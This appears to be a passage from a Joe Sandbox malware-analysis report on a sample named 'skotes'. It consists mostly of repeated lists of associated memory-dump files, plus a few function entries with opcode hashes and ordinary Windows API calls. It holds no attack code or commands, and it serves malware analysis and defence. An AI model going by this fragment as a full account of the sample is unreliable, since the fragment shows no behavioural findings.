Associated: 00000006.00000002.2951614135.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952170568.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952375131.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952566299.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952735873.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952926345.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953089376.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953301674.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: CreateSleepThread
String ID:
API String ID: 4202482776-0
Opcode ID: 8982f2b08cfc4f587b63c77307b9cceb1928bcd6e9e5da49697134e8041db47b
Instruction ID: 46393177e4ddc858e26e510123137d90136c71479b1be5ae42855eea4ae4f949
Opcode Fuzzy Hash: 8982f2b08cfc4f587b63c77307b9cceb1928bcd6e9e5da49697134e8041db47b
Instruction Fuzzy Hash: 2AD08C307D4724F6F23007202C1BF26AE209F4AF40F26484073883F0D081E8300097E8

Function 00958380 Relevance: 1.7, APIs: 1, Instructions: 159COMMON

Download Yara Rule

APIs

GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00958524

Memory Dump Source

Source File: 00000006.00000002.2937510596.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000006.00000002.2937176448.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2937510596.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938439390.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938618221.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938957082.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939079907.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939243238.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940722734.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940988724.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941257722.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941445903.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942163259.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942439132.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942671509.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942953132.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943176077.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943428132.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943687914.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943929325.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944212064.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944525487.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944806255.0000000000B71000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945152540.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945534979.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945854385.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946226165.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946573191.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946939801.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947312509.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947594109.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947914571.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948235215.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948549170.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948832412.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949019082.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949315319.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949565469.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949851834.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950106154.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950334370.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950602259.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950864678.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951152869.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951385221.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952170568.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952375131.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952566299.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952735873.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952926345.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953089376.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953301674.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: 106186594d937b1f2bfec4ff46f586affcdb87b2c5f40cff925e441a14d79376
Instruction ID: e835707b4527922eb55017a99c94baa6067801b6d01300d4ac90bc22a452b85c
Opcode Fuzzy Hash: 106186594d937b1f2bfec4ff46f586affcdb87b2c5f40cff925e441a14d79376
Instruction Fuzzy Hash: F8513470D042089BEB24EF69CD457EEB775EB81314F5042A8FC08A72D1EF349E888B91

Function 00987124 Relevance: 1.6, APIs: 1, Instructions: 56timeCOMMON

Download Yara Rule

APIs

SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?,?,0098705B,?,?,00000000,00000000), ref: 00987166

Memory Dump Source

Source File: 00000006.00000002.2937510596.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000006.00000002.2937176448.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2937510596.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938439390.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938618221.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938957082.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939079907.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939243238.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940722734.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940988724.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941257722.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941445903.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942163259.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942439132.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942671509.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942953132.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943176077.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943428132.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943687914.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943929325.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944212064.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944525487.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944806255.0000000000B71000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945152540.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945534979.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945854385.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946226165.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946573191.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946939801.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947312509.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947594109.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947914571.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948235215.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948549170.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948832412.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949019082.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949315319.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949565469.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949851834.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950106154.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950334370.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950602259.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950864678.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951152869.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951385221.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952170568.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952375131.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952566299.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952735873.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952926345.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953089376.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953301674.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: Time$LocalSpecificSystem
String ID:
API String ID: 2574697306-0
Opcode ID: adcb00d08a7c9f72bbf0d0771aad1e0c1ede8258490b390dec2c7c729946501b
Instruction ID: 9ff9d1614f7390cfa746bf0bc10be18c14a39b8aa8a20d641e30f1ebeb8fb4e0
Opcode Fuzzy Hash: adcb00d08a7c9f72bbf0d0771aad1e0c1ede8258490b390dec2c7c729946501b
Instruction Fuzzy Hash: 01112EB290810CABDB10EED5C944EDFB7BCAF09310F605262E511E3180EB30EA45DB61

Function 0098AC53 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 0098AC8D

Memory Dump Source

Source File: 00000006.00000002.2937510596.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000006.00000002.2937176448.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2937510596.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938439390.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938618221.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938957082.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939079907.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939243238.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940722734.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940988724.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941257722.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941445903.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942163259.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942439132.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942671509.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942953132.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943176077.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943428132.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943687914.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943929325.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944212064.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944525487.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944806255.0000000000B71000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945152540.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945534979.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945854385.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946226165.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946573191.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946939801.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947312509.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947594109.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947914571.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948235215.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948549170.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948832412.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949019082.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949315319.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949565469.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949851834.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950106154.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950334370.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950602259.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950864678.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951152869.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951385221.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952170568.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952375131.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952566299.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952735873.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952926345.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953089376.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953301674.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: fc810a18b747c3006b83a1b37cd1fcbb0cf41fa38204c20860ce1d5c299d326b
Instruction ID: 13a6a3343898aed10479f93248c1c10b2471f5f96fe43a7f896566c471b0b500
Opcode Fuzzy Hash: fc810a18b747c3006b83a1b37cd1fcbb0cf41fa38204c20860ce1d5c299d326b
Instruction Fuzzy Hash: 01111571A0420AAFCF05DF58E941A9A7BF9EF48304F05406AF809AB351D630EE21DBA5

Function 0098D82F Relevance: 1.5, APIs: 1, Instructions: 40memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0098A813,00000001,00000364,00000006,000000FF,?,0096D3FC,031FA665,?,00967A8B,?), ref: 0098D871

Memory Dump Source

Source File: 00000006.00000002.2937510596.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000006.00000002.2937176448.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2937510596.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938439390.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938618221.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938957082.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939079907.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939243238.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940722734.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940988724.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941257722.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941445903.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942163259.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942439132.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942671509.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942953132.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943176077.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943428132.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943687914.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943929325.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944212064.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944525487.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944806255.0000000000B71000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945152540.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945534979.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945854385.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946226165.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946573191.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946939801.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947312509.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947594109.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947914571.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948235215.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948549170.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948832412.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949019082.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949315319.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949565469.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949851834.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950106154.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950334370.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950602259.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950864678.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951152869.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951385221.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952170568.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952375131.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952566299.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952735873.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952926345.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953089376.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953301674.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 982a465ff7fca20e22d96806ce12158aa48910303a9c5c7c16b6c4c2fe2d633c
Instruction ID: 7f7b49468bf7a155cbb3cfac34155b929dca7cbc2b4d3c32699fd34522cea2e7
Opcode Fuzzy Hash: 982a465ff7fca20e22d96806ce12158aa48910303a9c5c7c16b6c4c2fe2d633c
Instruction Fuzzy Hash: 0FF0823260722566EB217A769D05B6B775DDF86770F198521BD09A73C1DA24EC0087E0

Function 0098B04B Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,031FA665,?,?,0096D3FC,031FA665,?,00967A8B,?,?,?,?,?,?,00957465,?), ref: 0098B07E

Memory Dump Source

Source File: 00000006.00000002.2937510596.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000006.00000002.2937176448.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2937510596.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938439390.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938618221.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938957082.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939079907.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939243238.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940722734.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940988724.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941257722.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941445903.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942163259.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
